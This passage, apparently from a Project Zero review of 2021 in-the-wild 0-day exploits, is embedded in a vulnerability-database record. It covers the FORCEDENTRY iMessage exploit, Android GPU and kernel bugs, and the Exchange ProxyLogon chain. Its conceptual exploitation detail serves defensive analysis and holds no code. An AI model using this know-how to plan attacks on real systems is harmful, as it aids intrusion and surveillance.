[CVE-2020-27950](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27950.html>). 
This year\u2019s [CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>) is a pretty close variant to 2020\u2019s [CVE-2020-27932](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27932.html>). Tielei Wang and Xinru Chi actually [presented on this vulnerability at zer0con 2021](<https://github.com/wangtielei/Slides/blob/main/zer0con21.pdf>) in April 2021. In their presentation, they explained that they found it while doing variant analysis on [CVE-2020-27932](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27932.html>). [TieLei Wang explained via Twitter](<https://twitter.com/WangTielei/status/1486266258152726530>) that they had found the vulnerability in December 2020 and had noticed it was fixed in beta versions of iOS 14.4 and macOS 11.2 which is why they presented it at Zer0Con. The in-the-wild exploit only targeted macOS 10, but used the same exploitation technique as the one presented.\n\nThe two FORCEDENTRY exploits ([CVE-2021-30860](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>) and the [sandbox escape](<https://googleprojectzero.blogspot.com/2022/03/forcedentry-sandbox-escape.html>)) were the only times that made us all go \u201cwow!\u201d this year. For [CVE-2021-30860](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>), the integer overflow in CoreGraphics, it was because: \n\n 1. For years we\u2019ve all heard about how attackers are using 0-click iMessage bugs and finally we have a public example, and\n 2. The exploit was an impressive work of art. \n\nThe sandbox escape (CVE requested, not yet assigned) was impressive because it\u2019s one of the few times we\u2019ve seen a sandbox escape in-the-wild that uses only logic bugs, rather than the standard memory corruption bugs. 
\n\nFor [CVE-2021-30860](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>), the vulnerability itself wasn\u2019t especially notable: a classic integer overflow within the JBIG2 parser of the CoreGraphics PDF decoder. The exploit, though, was described by Samuel Gro\u00df & Ian Beer as \u201cone of the most technically sophisticated exploits [they]\u2019ve ever seen\u201d. [Their blogpost shares all the details](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>), but the highlight is that the exploit uses the logical operators available in JBIG2 to build NAND gates which are used to build its own computer architecture. The exploit then writes the rest of its exploit using that new custom architecture. From their blogpost:\n\nUsing over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.\n\nThe bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.\n\nThis is an example of what making 0-day exploitation hard could look like: attackers having to develop a new and novel way to exploit a bug and that method requires lots of expertise and/or time to develop. This year, the two FORCEDENTRY exploits were the only 0-days out of the 58 that really impressed us. Hopefully in the future, the bar has been raised such that this will be required for any successful exploitation.\n\n## Android\n\nThere were 7 Android in-the-wild 0-days detected and disclosed this year. 
Prior to 2021 there had only been 1 and it was in 2019: [CVE-2019-2215](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2019/CVE-2019-2215.html>). Like WebKit, this lack of data makes it hard for us to assess trends and changes. Instead, we\u2019ll compare it to public security research.\n\nFor the 7 Android 0-days they targeted the following components:\n\n * Qualcomm Adreno GPU driver ([CVE-2020-11261](<https://source.android.com/security/bulletin/2021-01-01>), [CVE-2021-1905](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-1905.html>), [CVE-2021-1906](<https://source.android.com/security/bulletin/2021-05-01>))\n * ARM Mali GPU driver ([CVE-2021-28663](<https://source.android.com/security/bulletin/2021-05-01>), [CVE-2021-28664](<https://source.android.com/security/bulletin/2021-05-01>))\n * Upstream Linux kernel ([CVE-2021-1048](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1048.html>), [CVE-2021-0920](<https://source.android.com/security/bulletin/2021-11-01#kernel-components>))\n\n5 of the 7 0-days from 2021 targeted GPU drivers. This is actually not that surprising when we consider the evolution of the Android ecosystem as well as recent public security research into Android. The Android ecosystem is quite fragmented: many different kernel versions, different manufacturer customizations, etc. If an attacker wants a capability against \u201cAndroid devices\u201d, they generally need to maintain many different exploits to have a decent percentage of the Android ecosystem covered. However, if the attacker chooses to target the GPU kernel driver instead of another component, they will only need to have two exploits since most Android devices use 1 of 2 GPUs: either the Qualcomm Adreno GPU or the ARM Mali GPU. \n\nPublic security research mirrored this choice in the last couple of years as well. 
When developing full exploit chains (for defensive purposes) to target Android devices, [Guang Gong](<https://github.com/secmob/TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices/blob/master/us-20-Gong-TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices-wp.pdf>), [Man Yue Mo](<https://securitylab.github.com/research/one_day_short_of_a_fullchain_android/>), and [Ben Hawkes](<https://googleprojectzero.blogspot.com/2020/09/attacking-qualcomm-adreno-gpu.html>) all chose to attack the GPU kernel driver for local privilege escalation. Seeing the in-the-wild 0-days also target the GPU was more of a confirmation rather than a revelation. Of the 5 0-days targeting GPU drivers, 3 were in the Qualcomm Adreno driver and 2 in the ARM Mali driver. \n\nThe two non-GPU driver 0-days ([CVE-2021-0920](<https://source.android.com/security/bulletin/2021-11-01#kernel-components>) and [CVE-2021-1048](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1048.html>)) targeted the upstream Linux kernel. Unfortunately, these 2 bugs shared a singular characteristic with the Android in-the-wild 0-day seen in 2019: all 3 were previously known upstream before their exploitation in Android. While the sample size is small, it\u2019s still quite striking to see that 100% of the known in-the-wild Android 0-days that target the kernel are bugs that actually were known about before their exploitation.\n\nThe vulnerability now referred to as [CVE-2021-0920](<https://source.android.com/security/bulletin/2021-11-01#kernel-components>) was actually found in September 2016 and [discussed on the Linux kernel mailing lists](<https://lore.kernel.org/lkml/CAOssrKcfncAYsQWkfLGFgoOxAQJVT2hYVWdBA6Cw7hhO8RJ_wQ@mail.gmail.com/>). A [patch was even developed back in 2016](<https://lore.kernel.org/lkml/1475150954-10152-1-git-send-email-mszeredi@redhat.com/>), but it didn\u2019t end up being submitted. 
The bug was finally [fixed in the Linux kernel in July 2021](<https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cbcf01128d0a92e131bd09f1688fe032480b65ca>) after the detection of the in-the-wild exploit targeting Android. The patch then made it into the [Android security bulletin in November 2021](<https://source.android.com/security/bulletin/2021-11-01#kernel-components>).\n\n[CVE-2021-1048](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1048.html>) remained unpatched in Android for 14 months after it was patched in the Linux kernel. The Linux kernel was actually only vulnerable to the issue for a few weeks, but due to Android patching practices, that few weeks became almost a year for some Android devices. If an Android OEM synced to the upstream kernel, then they likely were patched against the vulnerability at some point. But many devices, such as recent Samsung devices, had not and thus were left vulnerable.\n\n## Microsoft Exchange Server\n\nIn 2021, there were 5 in-the-wild 0-days targeting Microsoft Exchange Server. This is the first time any Exchange Server in-the-wild 0-days have been detected and disclosed since we began tracking in-the-wild 0-days. The first four ([CVE-2021-26855](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26855.html>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>)) were all disclosed and patched at the same time and used together in a [single operation](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). The fifth ([CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>)) was patched on its own in November 2021. 
[CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>) was demonstrated at Tianfu Cup and then discovered in-the-wild by Microsoft. While no other in-the-wild 0-days were disclosed as part of the chain with [CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>), the attackers would have required at least another 0-day for successful exploitation since [CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>) is a post-authentication bug.\n\nOf the four Exchange in-the-wild 0-days used in the first campaign, [CVE-2021-26855](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26855.html>), which is also known as \u201cProxyLogon\u201d, is the only one that\u2019s pre-auth. [CVE-2021-26855](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26855.html>) is a server side request forgery (SSRF) vulnerability that allows unauthenticated attackers to send arbitrary HTTP requests as the Exchange server. The other three vulnerabilities were post-authentication. For example, [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) allowed attackers to write arbitrary files to the system. [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is a remote code execution vulnerability due to a deserialization bug in the Unified Messaging service. This allowed attackers to run code as the privileged SYSTEM user.\n\nFor the second campaign, [CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>), like [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), is a post-authentication RCE vulnerability due to insecure deserialization. 
It seems that while attempting to harden Exchange, Microsoft inadvertently introduced another deserialization vulnerability.\n\nWhile there were a significant number of 0-days in Exchange detected and disclosed in 2021, it\u2019s important to remember that they were all used as 0-days in only two different campaigns. This is an example of why we don\u2019t suggest using the number of 0-days in a product as a metric to assess the security of a product. Requiring the use of four 0-days for attackers to have success is preferable to an attacker only needing one 0-day to successfully gain access.\n\nWhile this is the first time Exchange in-the-wild 0-days have been detected and disclosed since Project Zero began our tracking, this is not unexpected. In 2020 there was [n-day exploitation of Exchange Servers](<https://www.cisa.gov/uscert/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688>). Whether this was the first year that attackers began the 0-day exploitation or if this was the first year that defenders began detecting the 0-day exploitation, this is not an unexpected evolution and we\u2019ll likely see it continue into 2022.\n\n# Outstanding Questions\n\nWhile there has been progress on detection and disclosure, that progress has shown just how much work there still is to do. The more data we gained, the more questions that arose about biases in detection, what we\u2019re missing and why, and the need for more transparency from both vendors and researchers.\n\nUntil the day that attackers decide to happily share all their exploits with us, we can\u2019t fully know what percentage of 0-days are publicly known about. However, when we pull together our expertise as security researchers and anecdotes from others in the industry, it paints a picture of some of the data we\u2019re very likely missing. 
From that, these are some of the key questions we\u2019re asking ourselves as we move into 2022:\n\n## Where are the [x] 0-days?\n\nDespite the number of 0-days found in 2021, there are key targets missing from the 0-days discovered. For example, we know that messaging applications like WhatsApp, Signal, Telegram, etc. are targets of interest to attackers, and yet only one messaging-app 0-day (in this case, in iMessage) was found this past year. Since we began tracking in mid-2014 the total is two: a WhatsApp 0-day in 2019 and this iMessage 0-day found in 2021.\n\nAlong with messaging apps, there are other platforms/targets we\u2019d expect to see 0-days targeting, yet there are no or very few public examples. For example, since mid-2014 there\u2019s only one in-the-wild 0-day each for macOS and Linux. There are no known in-the-wild 0-days targeting cloud, CPU vulnerabilities, or other phone components such as the WiFi chip or the baseband.\n\nThis leads to the question of whether these 0-days are absent due to lack of detection, lack of disclosure, or both.\n\n## Do some vendors have no known in-the-wild 0-days because they\u2019ve never been found or because they don\u2019t publicly disclose?\n\nUnless a vendor has told us that they will publicly disclose exploitation status for all vulnerabilities in their platforms, we, the public, don\u2019t know if the absence of an annotation means that there is no known exploitation of a vulnerability or if there is, but the vendor is just not sharing that information publicly. 
Thankfully this question is something that has a pretty clear solution: all device and software vendors agreeing to publicly disclose when there is evidence to suggest that a vulnerability in their product is being exploited in-the-wild.\n\n## Are we seeing the same bug patterns because that\u2019s what we know how to detect?\n\nAs we described earlier in this report, all the 0-days we saw in 2021 had similarities to previously seen vulnerabilities. This leads us to wonder whether or not that\u2019s actually representative of what attackers are using. Are attackers actually having success exclusively using vulnerabilities in bug classes and components that are previously public? Or are we detecting all these 0-days with known bug patterns because that\u2019s what we know how to detect? Public security research would suggest that yes, attackers are still able to have success with using vulnerabilities in known components and bug classes the majority of the time. But we\u2019d still expect to see a few novel and unexpected vulnerabilities in the grouping. We posed this question back in the 2019 year-in-review and it still lingers. \n\n## Where are the spl0itz?\n\nTo successfully exploit a vulnerability there are two key pieces that make up that exploit: the vulnerability being exploited, and the exploitation method (how that vulnerability is turned into something useful). \n\nUnfortunately, this report could only really analyze one of these components: the vulnerability. Out of the 58 0-days, only 5 have an exploit sample publicly available. Discovered in-the-wild 0-days are the failure case for attackers and a key opportunity for defenders to learn what attackers are doing and make it harder, more time-intensive, more costly, to do it again. Yet without the exploit sample or a detailed technical write-up based upon the sample, we can only focus on fixing the vulnerability rather than also mitigating the exploitation method. 
This means that attackers are able to continue to use their existing exploit methods rather than having to go back to the design and development phase to build a new exploitation method. While acknowledging that sharing exploit samples can be challenging (we have that challenge too!), we hope in 2022 there will be more sharing of exploit samples or detailed technical write-ups so that we can come together to use every possible piece of information to make it harder for the attackers to exploit more users.\n\nAs an aside, if you have an exploit sample that you\u2019re willing to share with us, please reach out. Whether it\u2019s sharing with us and having us write a detailed technical description and analysis or having us share it publicly, we\u2019d be happy to work with you.\n\n# Conclusion\n\nLooking back on 2021, what comes to mind is \u201cbaby steps\u201d. We can see clear industry improvement in the detection and disclosure of 0-day exploits. But the better detection and disclosure has highlighted other opportunities for progress. As an industry we\u2019re not making 0-day hard. Attackers are having success using vulnerabilities similar to what we\u2019ve seen previously and in components that have previously been discussed as attack surfaces. The goal is to force attackers to start from scratch each time we detect one of their exploits: they\u2019re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. And while we made distinct progress in detection and disclosure it has shown us areas where that can continue to improve.\n\nWhile this all may seem daunting, the promising part is that we\u2019ve done it before: we have made clear progress on previously daunting goals. In 2019, we discussed the large detection deficit for 0-day exploits and 2 years later more than double were detected and disclosed. 
So while there is still plenty more work to do, it\u2019s a tractable problem. There are concrete steps that the tech and security industries can take to make even more progress: \n\n\n 1. Make it an industry standard behavior for all vendors to publicly disclose when there is evidence to suggest that a vulnerability in their product is being exploited;\n 2. Vendors and security researchers sharing exploit samples or detailed descriptions of the exploit techniques;\n 3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable.\n\nThrough 2021 we continually saw the real world impacts of the use of 0-day exploits against users and entities. Amnesty International, the Citizen Lab, and others highlighted [over](<https://citizenlab.ca/2021/10/breaking-news-new-york-times-journalist-ben-hubbard-pegasus/>) and [over](<https://www.amnesty.org/en/documents/doc10/4491/2021/en/>) how governments were using commercial surveillance products against [journalists](<https://forbiddenstories.org/pegasus-the-new-global-weapon-for-silencing-journalists/>), [human rights defenders](<https://www.amnesty.org/en/latest/research/2021/11/devices-of-palestinian-human-rights-defenders-hacked-with-nso-groups-pegasus-spyware-2/>), and [government officials](<https://www.reuters.com/technology/exclusive-us-state-department-phones-hacked-with-israeli-company-spyware-sources-2021-12-03/>). We saw many enterprises scrambling to remediate and protect themselves from the [Exchange Server 0-days](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). And we even learned of peer [security researchers being targeted by North Korean government hackers](<https://blog.google/threat-analysis-group/update-campaign-targeting-security-researchers/>). 
While the majority of people on the planet do not need to worry about their own personal risk of being targeted with 0-days, 0-day exploitation still affects us all. These 0-days tend to have an outsized impact on society so we need to continue doing whatever we can to make it harder for attackers to be successful in these attacks.\n\n2021 showed us we\u2019re on the right track and making progress, but there\u2019s plenty more to be done to make 0-day hard.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-19T00:00:00", "type": "googleprojectzero", "title": "\nThe More You Know, The More You Know You Don\u2019t Know\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4654", "CVE-2019-13720", "CVE-2019-2215", "CVE-2019-6625", "CVE-2020-0688", "CVE-2020-11261", "CVE-2020-16009", "CVE-2020-27932", "CVE-2020-27950", "CVE-2021-0920", "CVE-2021-1048", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1844", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-26411", 
"CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-28310", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30737", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-30883", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021